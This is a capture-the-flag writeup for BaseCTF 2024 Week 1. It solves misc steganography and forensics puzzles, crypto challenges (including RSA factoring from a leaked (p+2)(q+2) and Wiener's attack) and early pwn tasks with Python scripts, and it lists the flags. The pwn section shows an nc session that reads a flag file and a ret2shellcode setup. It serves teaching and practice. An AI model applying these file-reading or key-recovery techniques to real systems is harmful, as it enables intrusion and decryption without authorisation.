BaseCTF2024 Week1 Writeup

Misc

Countdown? Poster! (倒计时?海报!)

The flag is printed on the countdown poster itself.

BaseCTF{c0unt_d0wn_fro3_X_every_d@y_i5_re@11y_c0o1_@nd_h@rd_t0_do_1t_ev3ry_n1ght}

Check-in! DK Shield! (签到!DK 盾!)

Send "BaseCTF2024" to the official WeChat account to receive the flag.

BaseCTF{2024_sp0n5ored_by_dkdun}

Miaomiao is so cute (喵喵太可爱了)

The group members are impressive; the flag was handed out in the chat group.

BaseCTF{m1a0_mi@o_1s_n0t_a_b3tr4yer_t0_t3l1_the_f1ag}

Cover X Ears (捂住X只耳)

Unconventional audio steganography.

Following the hint, split the left and right channels and compare their contents. In Audacity:

1. Select the left channel and apply Effect -> Invert.
2. Select all tracks and choose Tracks -> Mix -> Mix and Render to New Track.

Inverting one channel and then mixing is the same as computing L - R sample by sample, so everything the two channels have in common cancels and only the difference survives. The spectrogram of the rendered track shows Morse code.

Decoding it gives the flag.

BaseCTF{FOLLOWYOURHEART}
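The invert-and-mix step is a per-sample subtraction, and the Morse can be read from the energy of the difference signal just as well as from its spectrogram. The block below is an added example, not the writeup's work or the challenge's file: it builds a stereo WAV in memory in which both channels carry the same carrier tone and only the left channel carries a keyed Morse tone, computes L - R, thresholds the windowed energy of the difference, and decodes the Morse. The sample rate, tone frequencies and keying speed of the constructed clip are assumptions; a real attachment would be passed to split_channels instead.

```python
import io
import math
import struct
import wave

RATE, UNIT = 8000, 0.1          # sample rate and Morse dot length (s); assumptions for the constructed clip
TONE_HZ, CARRIER_HZ = 800, 220  # keyed tone (left channel only) and shared carrier (both channels)

MORSE = {'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.', 'F': '..-.', 'G': '--.', 'H': '....',
         'I': '..', 'J': '.---', 'K': '-.-', 'L': '.-..', 'M': '--', 'N': '-.', 'O': '---', 'P': '.--.',
         'Q': '--.-', 'R': '.-.', 'S': '...', 'T': '-', 'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-',
         'Y': '-.--', 'Z': '--..'}
FROM_MORSE = {v: k for k, v in MORSE.items()}


def keying(text):
    """Morse timing as (tone_on, units): dot 1, dash 3; gaps 1 (symbol), 3 (letter), 7 (word)."""
    out = []
    for word in text.upper().split():
        for ch in word:
            for sym in MORSE[ch]:
                out += [(True, 1 if sym == '.' else 3), (False, 1)]
            out[-1] = (False, 3)      # letter gap replaces the last symbol gap
        out[-1] = (False, 7)          # word gap replaces the last letter gap
    out[-1] = (False, 2)              # trailing silence so the last run is closed
    return out


def make_stereo_wav(text):
    """Constructed sample: carrier in both channels, keyed tone only on the left. Returns WAV bytes."""
    frames, t = [], 0
    for on, units in keying(text):
        for _ in range(int(units * UNIT * RATE)):
            carrier = 0.5 * math.sin(2 * math.pi * CARRIER_HZ * t / RATE)
            hidden = 0.3 * math.sin(2 * math.pi * TONE_HZ * t / RATE) if on else 0.0
            frames.append(struct.pack('<hh', int(32767 * (carrier + hidden)), int(32767 * carrier)))
            t += 1
    buf = io.BytesIO()
    with wave.open(buf, 'wb') as w:
        w.setnchannels(2)
        w.setsampwidth(2)
        w.setframerate(RATE)
        w.writeframes(b''.join(frames))
    return buf.getvalue()


def split_channels(wav_bytes):
    """(left, right, rate) from a 16-bit stereo PCM WAV; the real challenge file goes in here."""
    with wave.open(io.BytesIO(wav_bytes), 'rb') as w:
        if w.getnchannels() != 2 or w.getsampwidth() != 2:
            raise ValueError('expected 16-bit stereo PCM')
        raw, rate = w.readframes(w.getnframes()), w.getframerate()
    samples = struct.unpack('<%dh' % (len(raw) // 2), raw)
    return list(samples[0::2]), list(samples[1::2]), rate


def invert_and_mix(left, right):
    # Audacity's "invert the left channel, mix and render" is L + (-R) = L - R: the common part cancels.
    return [l - r for l, r in zip(left, right)]


def on_off_runs(signal, rate, win=0.02):
    """Windowed RMS energy, thresholded at half the maximum, collapsed into (tone_on, seconds) runs."""
    n = int(rate * win)
    energies = [math.sqrt(sum(x * x for x in signal[i:i + n]) / n)
                for i in range(0, len(signal) - n + 1, n)]
    thresh = max(energies) / 2
    runs = []
    for e in energies:
        on = e > thresh
        if runs and runs[-1][0] == on:
            runs[-1][1] += win
        else:
            runs.append([on, win])
    return [(on, round(d, 2)) for on, d in runs]


def decode_morse(runs):
    """Tone shorter than 2 units is a dot, else a dash; silence of 5+ units is a word gap,
    2+ a letter gap (midpoint thresholds), anything shorter only separates symbols."""
    letters, cur = [], ''
    for on, dur in runs:
        u = dur / UNIT
        if on:
            cur += '.' if u < 2 else '-'
        elif u >= 5:
            letters += [cur, ' ']
            cur = ''
        elif u >= 2:
            letters.append(cur)
            cur = ''
    if cur:
        letters.append(cur)
    return ''.join(' ' if l == ' ' else FROM_MORSE.get(l, '?') for l in letters)


def recover(wav_bytes):
    left, right, rate = split_channels(wav_bytes)
    return decode_morse(on_off_runs(invert_and_mix(left, right), rate))
```

recover(make_stereo_wav('FOLLOW YOUR HEART')) returns 'FOLLOW YOUR HEART'. On a real file, look at the runs from on_off_runs first and set UNIT to the sender's dot length before decoding.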

Life is short, I use Python (人生苦短,我用Python)

Analyze the attached script and reconstruct the flag from its constraints. Indices below are 0-based Python indices.

len(flag) == 38

The flag is exactly 38 characters long.

flag.startswith('BaseCTF{')

The flag starts with BaseCTF{ (indices 0-7).

flag.find('Mp') == 10

'Mp' first occurs at index 10, i.e. flag[10:12] == 'Mp'.

flag[-3:] * 8 == '3x}3x}3x}3x}3x}3x}3x}3x}'

The last 3 characters repeated 8 times give 3x}3x}3x}3x}3x}3x}3x}3x}, so the flag ends with 3x}.

ord(flag[-1]) == 125

The ASCII code of the last character is 125, which is }.

flag.count('_') // 2 == 2

The number of '_' characters floor-divided by 2 is 2, so the flag contains 4 or 5 underscores; the split check below settles it at 4.

list(map(len, flag.split('_'))) == [14, 2, 6, 4, 8]

Splitting on '_' gives parts of length 14, 2, 6, 4 and 8, which places the four underscores at indices 14, 17, 24 and 29 (14+2+6+4+8 plus the 4 separators is 38).

flag[12:32:4] == 'lsT_n'

Starting at index 12 and taking every 4th character below index 32 gives 'lsT_n', i.e. flag[12] = 'l', flag[16] = 's', flag[20] = 'T', flag[24] = '_', flag[28] = 'n'.

'😺'.join([c.upper() for c in flag[:9]]) == 'B😺A😺S😺E😺C😺T😺F😺{😺S'

The first 9 characters upper-cased and joined with '😺' give 'B😺A😺S😺E😺C😺T😺F😺{😺S', so flag[8] is 's' or 'S'; the islower() check further down makes it 's'.

flag[-11].isnumeric() or int(flag[-11]) ** 5 == 1024

flag[-11] (index 27) must be a digit. Because of the short-circuiting `or`, any digit satisfies this line on its own; the 1024 = 4 ** 5 hint points at '4', which the final SHA-1 check confirms.

base64.b64encode(flag[-7:-3].encode()) == b'MG1QbA=='

flag[-7:-3] (indices 31-34) Base64-encodes to MG1QbA==, so those characters are 0mPl.

flag[::-7].encode().hex() == '7d4372733173'

Reading the flag backwards with step 7 (indices 37, 30, 23, 16, 9, 2) and hex-encoding gives 7d4372733173, i.e. the characters }Crs1s.

set(flag[12::11]) == {'l', 'r'}

Starting at index 12 and taking every 11th character (indices 12, 23, 34) gives the set {'l', 'r'}, so those three positions contain only 'l' and 'r'; with flag[12] = 'l' and flag[23] = 'r' already known, flag[34] must be 'l' (or 'r', and the base64 check above says 'l').

flag[21:27].encode() == bytes([116, 51, 114, 95, 84, 104])

Indices 21-26 have byte values [116, 51, 114, 95, 84, 104], i.e. 't3r_Th'.

sum(ord(c) * 2024_08_15 ** idx for idx, c in enumerate(flag[17:20])) == 41378751114180610

The ASCII values of indices 17-19, weighted by the power of 20240815 matching their position, sum to 41378751114180610. Reading the sum as a base-20240815 number gives the digits 95, 66, 101, i.e. '_Be'.

all([flag[0].isalpha(), flag[8].islower(), flag[13].isdigit()])

The first character is a letter, flag[8] is lower-case, and flag[13] is a digit.

'{whats} {up}'.format(whats=flag[13], up=flag[15]).replace('3', 'bro') == 'bro 1'

In the format string '{whats} {up}', whats is flag[13] and up is flag[15]; after replacing every '3' with 'bro' the result must be 'bro 1', so flag[13] = '3' and flag[15] = '1'.

hashlib.sha1(flag.encode()).hexdigest() == 'e40075055f34f88993f47efb3429bd0e44a7f479'

The SHA-1 of the whole flag is e40075055f34f88993f47efb3429bd0e44a7f479; this last line pins the complete string and confirms the reconstruction.

Putting everything together gives the flag:

BaseCTF{s1Mpl3_1s_BeTt3r_Th4n_C0mPl3x}
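The constraints are easiest to get right by writing them down as a checker and filling a 38-slot template from the positional facts. The block below is an added example, not the challenge's script or the writeup's code: FRAGMENTS lists what each constraint pins down, solve() assembles the flag and refuses contradictions, check() re-runs every constraint except the SHA-1, and sha1_matches() applies that last line on its own.

```python
import base64
import hashlib

FLAG_LEN = 38
# Positional facts read off the constraints above (0-based indices).
FRAGMENTS = [
    (0, 'BaseCTF{'),                                # startswith
    (10, 'Mp'),                                     # find('Mp') == 10
    (35, '3x}'),                                    # flag[-3:] * 8
    (14, '_'), (17, '_'), (24, '_'), (29, '_'),     # split lengths [14, 2, 6, 4, 8]
    (12, 'l'), (16, 's'), (20, 'T'), (28, 'n'),     # flag[12:32:4] == 'lsT_n'
    (8, 's'),                                       # upper-cased prefix ends in 'S' and flag[8].islower()
    (27, '4'),                                      # flag[-11]: the 4 ** 5 == 1024 hint
    (31, '0mPl'),                                   # base64 'MG1QbA==' decodes to '0mPl'
    (30, 'C'), (23, 'r'), (9, '1'), (2, 's'),       # flag[::-7] == '}Crs1s'
    (21, 't3r_Th'),                                 # bytes([116, 51, 114, 95, 84, 104])
    (17, '_Be'),                                    # base-20240815 digits of 41378751114180610
    (13, '3'), (15, '1'),                           # '{whats} {up}' -> 'bro 1'
]


def solve():
    """Fill the template from the positional facts, refusing contradictory ones."""
    slots = [None] * FLAG_LEN
    for start, text in FRAGMENTS:
        for i, ch in enumerate(text):
            if slots[start + i] not in (None, ch):
                raise ValueError('conflict at index %d' % (start + i))
            slots[start + i] = ch
    missing = [i for i, ch in enumerate(slots) if ch is None]
    if missing:
        raise ValueError('unfilled indices: %s' % missing)
    return ''.join(slots)


def check(flag):
    """Every constraint of the script except the SHA-1, transcribed from the writeup."""
    return all([
        len(flag) == 38,
        flag.startswith('BaseCTF{'),
        flag.find('Mp') == 10,
        flag[-3:] * 8 == '3x}3x}3x}3x}3x}3x}3x}3x}',
        ord(flag[-1]) == 125,
        flag.count('_') // 2 == 2,
        list(map(len, flag.split('_'))) == [14, 2, 6, 4, 8],
        flag[12:32:4] == 'lsT_n',
        '😺'.join([c.upper() for c in flag[:9]]) == 'B😺A😺S😺E😺C😺T😺F😺{😺S',
        flag[-11].isnumeric() or int(flag[-11]) ** 5 == 1024,
        base64.b64encode(flag[-7:-3].encode()) == b'MG1QbA==',
        flag[::-7].encode().hex() == '7d4372733173',
        set(flag[12::11]) == {'l', 'r'},
        flag[21:27].encode() == bytes([116, 51, 114, 95, 84, 104]),
        sum(ord(c) * 2024_08_15 ** idx for idx, c in enumerate(flag[17:20])) == 41378751114180610,
        all([flag[0].isalpha(), flag[8].islower(), flag[13].isdigit()]),
        '{whats} {up}'.format(whats=flag[13], up=flag[15]).replace('3', 'bro') == 'bro 1',
    ])


def sha1_matches(flag, expected='e40075055f34f88993f47efb3429bd0e44a7f479'):
    """The script's last line: the hash pins the whole string, so it confirms the reconstruction."""
    return hashlib.sha1(flag.encode()).hexdigest() == expected


def digits_base(value, base):
    """Little-endian digits of value in the given base: how '_Be' falls out of the weighted sum."""
    out = []
    while value:
        value, d = divmod(value, base)
        out.append(d)
    return out


if __name__ == '__main__':
    flag = solve()
    print(flag, check(flag), sha1_matches(flag))
```

If a fragment were transcribed wrongly, solve() raises at the conflicting index instead of silently producing a string that then fails the hash.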

Base

Decoded in one pass with CyberChef.

BaseCTF{we1c0me_to_b4sectf}

Forwards or backwards? (正着看还是反着看呢?)

Inspecting the file in 010 Editor shows that its bytes are reversed (the JPEG magic appears, reversed, at the end). Reversing the whole file yields a JPG; carving the data appended to it (e.g. with binwalk) gives an embedded zip archive, which extracts to the flag.

BaseCTF{h3ll0_h4cker}
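The tell-tale of a byte-reversed file is that the format's magic sits at the end, reversed, while the appended archive's tail sits at the front. The block below is an added example, not the writeup's procedure or the challenge file: it recognises the reversed JPEG, undoes the reversal, carves the zip appended after the image (the manual equivalent of what binwalk does) and reads the flag member. The fake JPEG header, the archive contents and the member name flag.txt are constructed for the sample.

```python
import io
import zipfile

JPEG_SOI = b'\xff\xd8'          # start-of-image marker, first two bytes of a JPEG
JPEG_EOI = b'\xff\xd9'          # end-of-image marker, last two bytes of the image data
ZIP_LOCAL_HEADER = b'PK\x03\x04'


def looks_reversed(data):
    """A reversed file ends with the reversed magic of what its original began with (d8 ff),
    and does not start with the magic itself. Works even when other data was appended before
    the reversal, because that data ends up at the front."""
    return data[-2:] == JPEG_SOI[::-1] and not data.startswith(JPEG_SOI)


def unreverse(data):
    """Undo the byte reversal if present; otherwise hand the data back untouched."""
    return data[::-1] if looks_reversed(data) else data


def carve_zip(data):
    """Return the archive appended after the image. The zip is searched for after the first EOI
    rather than assumed to start exactly there, so padding between image and archive is tolerated."""
    if not data.startswith(JPEG_SOI):
        raise ValueError('not a JPEG')
    image_end = data.find(JPEG_EOI)
    if image_end < 0:
        raise ValueError('no EOI marker')
    start = data.find(ZIP_LOCAL_HEADER, image_end)
    if start < 0:
        raise ValueError('no zip appended after the image')
    return data[start:]


def extract_flag(blob, member='flag.txt'):
    data = unreverse(blob)
    with zipfile.ZipFile(io.BytesIO(carve_zip(data))) as z:
        return z.read(member).decode()


def build_sample():
    """Constructed challenge file: a minimal JPEG-like shell with a zip appended, then byte-reversed."""
    fake_jpeg = JPEG_SOI + b'\xff\xe0\x00\x10JFIF\x00' + b'\x00' * 16 + JPEG_EOI
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('flag.txt', 'flag{constructed_sample}')
    return (fake_jpeg + buf.getvalue())[::-1]


if __name__ == '__main__':
    sample = build_sample()
    print(looks_reversed(sample), extract_flag(sample))
```

Slicing the archive out before handing it to zipfile keeps the central-directory offsets valid, since they are relative to the start of the zip, not of the carrier file.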

Met a shark at sea (海上遇到了鲨鱼)

Open the capture in Wireshark and export the HTTP objects; flag.php contains the string

}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB

Reversing it gives the flag:

BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}

Can't get in at all! (根本进不去啊!)

dig queries DNS directly. The commonly requested record types are A, TXT (free-form text), MX and NS, or ANY for everything the server will return.

The hint makes clear that the flag is stored in a TXT record on the domain, so ask for that record type explicitly:

dig txt flag.basectf.fun

; <<>> DiG 9.18.28-0ubuntu0.22.04.1-Ubuntu <<>> txt flag.basectf.fun
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23701
;; flags: qr rd ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;flag.basectf.fun.              IN      TXT

;; ANSWER SECTION:
flag.basectf.fun.       0       IN      TXT     "FLAG: BaseCTF{h0h0_th1s_15_dns_rec0rd}"

;; Query time: 2060 msec
;; SERVER: 172.25.64.1#53(172.25.64.1) (UDP)
;; WHEN: Fri Aug 16 21:28:08 CST 2024
;; MSG SIZE  rcvd: 101

The answer section carries the flag:

BaseCTF{h0h0_th1s_15_dns_rec0rd}
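When a TXT record is longer than one line of output suggests, dig prints it as several quoted strings on one line, because DNS stores TXT data in chunks of at most 255 bytes; a Base64 or hex flag split that way has to be joined before decoding. The block below is an added example, not part of the writeup: it parses the ANSWER SECTION of dig output, joins the chunks, undoes dig's presentation escapes, and pulls out flag-shaped strings. The first answer line of the sample is the one from the dig run above; the other two lines are constructed to show chunking and escaping.

```python
import re

# One dig answer line: NAME TTL CLASS TYPE RDATA; for TXT the RDATA is one or more quoted strings.
_ANSWER = re.compile(r'^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+TXT\s+(?P<rdata>.*)$')
_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')


def _unescape(s):
    """Undo dig's presentation escapes: \\ddd is a decimal byte value, \\x is a literal x."""
    return re.sub(r'\\(\d{3}|.)', lambda m: chr(int(m[1])) if m[1].isdigit() else m[1], s)


def txt_records(dig_output):
    """Map owner name -> list of TXT values taken from the ANSWER SECTION of `dig TXT` output.
    The quoted strings of one record are concatenated, since a value over 255 bytes is printed
    as "part one" "part two"."""
    records = {}
    in_answer = False
    for line in dig_output.splitlines():
        if line.startswith(';; ANSWER SECTION'):
            in_answer = True
            continue
        if line.startswith(';'):
            in_answer = False
            continue
        m = _ANSWER.match(line) if in_answer else None
        if m:
            value = ''.join(_unescape(chunk) for chunk in _QUOTED.findall(m['rdata']))
            records.setdefault(m['name'], []).append(value)
    return records


def flags_in(dig_output, pattern=r'BaseCTF\{[^}]*\}'):
    """Pull flag-shaped substrings out of every TXT value, after the chunks are joined."""
    found = []
    for values in txt_records(dig_output).values():
        for v in values:
            found += re.findall(pattern, v)
    return found


# Constructed sample: the first answer line is from the dig run above, the other two are made up.
SAMPLE = """;; ANSWER SECTION:
flag.basectf.fun.       0       IN      TXT     "FLAG: BaseCTF{h0h0_th1s_15_dns_rec0rd}"
chunked.example.        300     IN      TXT     "BaseCTF{first_half_" "second_half}"
escaped.example.        300     IN      TXT     "quote \\" and byte \\065"

;; Query time: 2060 msec
"""

if __name__ == '__main__':
    print(txt_records(SAMPLE))
    print(flags_in(SAMPLE))
```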

Do you like relics too? (你也喜欢圣物吗)

The attachment is a password-protected zip plus an image. Inspecting the image's RGB channels reveals the key:

RGB:key=lud1_lud1

Extracting with it gives another archive, it is fake.zip. That one is only pseudo-encrypted: the encryption flag in the zip headers is set, but the data was never encrypted. Clearing the flag bit lets it extract normally and yields a Base64 string:

ZmxhZ3swaF9uMF9pdCdzX2Yza2V9UW1GelpVTlVSbnN4ZFRCZmNURmZlREZmTlRGck1YMD0=

Decoding it once gives a fake flag followed by a second Base64 string; decoding that gives the real flag:

flag{0h_n0_it's_f3ke}QmFzZUNURnsxdTBfcTFfeDFfNTFrMX0=
BaseCTF{1u0_q1_x1_51k1}
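Pseudo-encryption is a single bit: bit 0 of the general-purpose flags in each member's local header and central-directory entry. The block below is an added example, not the writeup's tooling: it walks the central directory from the end-of-central-directory record (rather than grepping for PK signatures, which can also occur inside compressed data), sets or clears the bit in both headers for every member, and shows that Python's zipfile refuses the fake-encrypted archive and accepts the repaired one. The archive and its flag.txt member are constructed for the sample.

```python
import io
import struct
import zipfile

ENCRYPTED_BIT = 0x0001   # bit 0 of the general-purpose flags, present in both header copies


def _entries(data):
    """Yield (central_header_offset, local_header_offset) for every member by walking the
    central directory from the end-of-central-directory record."""
    eocd = data.rfind(b'PK\x05\x06')
    if eocd < 0:
        raise ValueError('no end-of-central-directory record')
    cd_size, cd_offset = struct.unpack_from('<II', data, eocd + 12)
    pos = cd_offset
    while pos < cd_offset + cd_size:
        if data[pos:pos + 4] != b'PK\x01\x02':
            raise ValueError('corrupt central directory at %d' % pos)
        name_len, extra_len, comment_len = struct.unpack_from('<HHH', data, pos + 28)
        local_offset = struct.unpack_from('<I', data, pos + 42)[0]
        yield pos, local_offset
        pos += 46 + name_len + extra_len + comment_len


def _set_encrypted_bit(data, value):
    """Set or clear the encryption flag in every central (offset 8) and local (offset 6) header.
    Tools differ in which copy they trust, so always fix both."""
    buf = bytearray(data)
    for cd_pos, local_pos in _entries(data):
        for off in (cd_pos + 8, local_pos + 6):
            flags = struct.unpack_from('<H', buf, off)[0]
            flags = flags | ENCRYPTED_BIT if value else flags & ~ENCRYPTED_BIT
            struct.pack_into('<H', buf, off, flags)
    return bytes(buf)


def fake_encrypt(data):
    """What the challenge author did: mark the members encrypted without encrypting anything."""
    return _set_encrypted_bit(data, True)


def fix_fake_encryption(data):
    return _set_encrypted_bit(data, False)


def read_member(data, name):
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.read(name).decode()


def extraction_blocked(data, name):
    """True when zipfile refuses the member for lack of a password, i.e. the flag bit is set."""
    try:
        read_member(data, name)
        return False
    except RuntimeError as exc:
        return 'encrypted' in str(exc)


def build_sample():
    """Constructed stand-in for 'it is fake.zip': a normal archive, then fake-encrypted."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('flag.txt', 'flag{constructed_sample}')
    return fake_encrypt(buf.getvalue())


if __name__ == '__main__':
    sample = build_sample()
    print(extraction_blocked(sample, 'flag.txt'), read_member(fix_fake_encryption(sample), 'flag.txt'))
```

A genuinely encrypted archive also has the bit set, but its data will fail to decompress (or fail the CRC) after the bit is cleared; an archive that extracts cleanly after the fix was never encrypted.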

Crypto

Can you compute MD5? (你会算md5吗)

Each digest is the MD5 of a single printable character; invert them by hashing every printable ASCII character once and looking each digest up.

import hashlib

output = ''
dic = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']

# Hash each printable ASCII character once and look the digests up, instead of
# recomputing 95 hashes for every entry of dic.
table = {hashlib.md5(chr(i).encode()).hexdigest(): chr(i) for i in range(32, 127)}

for data in dic:
    output += table.get(data, '?')   # '?' marks a digest that is not a single printable character
print(output)

# BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}

ez_rsa

Besides n, e and c, the challenge leaks not_phi = (p+2)(q+2) (the leaked value is larger than n, so it is (p+2)(q+2) rather than (p-2)(q-2)). Expanding, (p+2)(q+2) = n + 2(p+q) + 4, so p+q = (not_phi - n - 4) / 2, and then phi = (p-1)(q-1) = n - (p+q) + 1 = not_phi - 3(p+q) - 3, which is what the script computes before the usual d = e^-1 mod phi.

from Crypto.Util.number import *
import gmpy2

n=96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
e=65537
c=37077223015399348092851894372646658604740267343644217689655405286963638119001805842457783136228509659145024536105346167019011411567936952592106648947994192469223516127472421779354488529147931251709280386948262922098480060585438392212246591935850115718989480740299246709231437138646467532794139869741318202945
not_phi=96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205

# (p+2)(q+2) = n + 2(p+q) + 4  =>  p+q = (not_phi - n - 4) / 2
p_q = (not_phi - n - 4) // 2

# phi = (p-1)(q-1) = n - (p+q) + 1 = not_phi - 3(p+q) - 3
phi = not_phi - 3 * p_q - 3

d=gmpy2.invert(e,phi)
m=pow(c,d,n)

print(long_to_bytes(m))

# BaseCTF{it_1s_ez!!}

helloCrypto

AES decryption. The key is given as an integer, which is the big-endian value of the 16-byte AES-128 key; the 48-byte ciphertext is three ECB blocks with PKCS#7 padding.

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = 208797759953288399620324890930572736628
ciphertext = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'

key_bytes = key.to_bytes(16, byteorder='big')   # the integer is the big-endian encoding of the 128-bit key
cipher = AES.new(key=key_bytes, mode=AES.MODE_ECB)

decrypted_padded = cipher.decrypt(ciphertext)
decrypted = unpad(decrypted_padded, AES.block_size)

print(decrypted.decode())

# BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}

Seventeen times (十七倍)

Each plaintext byte was multiplied by 17 modulo 256. Since 17 is odd it is invertible mod 256, and its inverse is 241 (17 * 241 = 4097 = 16 * 256 + 1; pow(17, -1, 256) computes it), so multiplying each ciphertext byte by 241 mod 256 undoes the encryption.

flag=''
cipher = [98, 113, 163, 181, 115, 148, 166, 43, 9, 95, 165, 146, 79, 115, 146, 233, 112, 180, 48, 79, 65, 181, 113, 146, 46, 249, 78, 183, 79, 133, 180, 113, 146, 148, 163, 79, 78, 48, 231, 77]

for i in cipher:
    flag += chr(i * 241 % 256)   # 241 = 17^-1 mod 256

print(flag)

# BaseCTF{yoUr_CrYpt0_1earNinG_5tarTs_n0w}

babyrsa

n is very large; the intended route is Wiener's attack (small private exponent d).
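Both ez_rsa and babyrsa end the same way: once p+q is known (from the (p+2)(q+2) leak in ez_rsa, or from phi recovered by Wiener's attack in babyrsa), p and q follow from the quadratic x^2 - (p+q)x + n = 0. The block below is an added example, not the writeup's scripts, that shares that step between the two attacks; it uses two well-known primes and a deliberately small d as toy parameters (assumptions, not the challenges' values), and the writeup's n, e, c and not_phi can be fed to the same functions.

```python
from math import gcd, isqrt


def factor_from_sum(n, s):
    """Recover (p, q) from n = p*q and s = p+q via the quadratic x^2 - s*x + n = 0."""
    disc = s * s - 4 * n
    if disc < 0:
        return None
    r = isqrt(disc)
    if r * r != disc or (s + r) % 2:
        return None
    p, q = (s - r) // 2, (s + r) // 2
    return (p, q) if p * q == n else None


def sum_from_shifted_product(n, leak, k):
    """ez_rsa: (p+k)(q+k) = n + k(p+q) + k^2, so p+q = (leak - n - k^2) / k.
    k = 2 is the challenge's not_phi; k = -2 would handle a (p-2)(q-2) leak the same way."""
    num = leak - n - k * k
    if num % k:
        raise ValueError('leak is not of the form (p+k)(q+k)')
    return num // k


def convergents(a, b):
    """Convergents h/k of the continued fraction of a/b, in order."""
    h0, h1, k0, k1 = 0, 1, 1, 0
    while b:
        q, (a, b) = a // b, (b, a % b)
        h0, h1 = h1, q * h1 + h0
        k0, k1 = k1, q * k1 + k0
        yield h1, k1


def wiener(e, n):
    """babyrsa: for d < n^(1/4)/3 (and q < p < 2q), k/d with k = (e*d-1)/phi is one of the
    convergents of e/n. Each candidate is validated by actually factoring n. Returns (d, p, q) or None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        pq = factor_from_sum(n, n - phi + 1)
        if pq:
            return d, pq[0], pq[1]
    return None


def decrypt(c, d, n):
    return pow(c, d, n)


# Toy parameters (assumptions, not the challenges' values): two well-known primes and a
# small d for the Wiener case.
P, Q = 1000000007, 998244353
N = P * Q
PHI = (P - 1) * (Q - 1)
E_NORMAL = 65537
D_SMALL = 101
E_WIENER = pow(D_SMALL, -1, PHI)
assert gcd(E_NORMAL, PHI) == 1 and gcd(D_SMALL, PHI) == 1

if __name__ == '__main__':
    leak = (P + 2) * (Q + 2)
    print(factor_from_sum(N, sum_from_shifted_product(N, leak, 2)))
    print(wiener(E_WIENER, N))
    print(decrypt(pow(12345, E_WIENER, N), D_SMALL, N))
```

factor_from_sum returns the primes in ascending order, so with these toy values it yields (998244353, 1000000007).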


babypack


ez_math


Pwn

echo

Print the flag with echo and an input redirection (bash expands $(<file) to the file's contents):

echo $(</flag)
BaseCTF{7aa12525-59e7-4975-83c7-847583c8cfc3}

Sign in (签个到吧)

A sign-in challenge: connect with nc and read the flag directly.

C:\Users\Xia\Desktop>nc challenge.basectf.fun 22508
ls
bin
dev
flag
lib
lib32
lib64
libexec
libx32
pwn
cat flag
BaseCTF{7ac71e2c-0a46-41a0-9ed8-116f0d30825e}

shellcode_level0

checksec shows every mitigation except the stack canary enabled:

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

NX is enabled, but the program mmaps the buffer that read() fills with prot = 7 (PROT_READ|PROT_WRITE|PROT_EXEC) and flags = 34 (MAP_PRIVATE|MAP_ANONYMOUS), so the input buffer itself is executable: ret2shellcode.

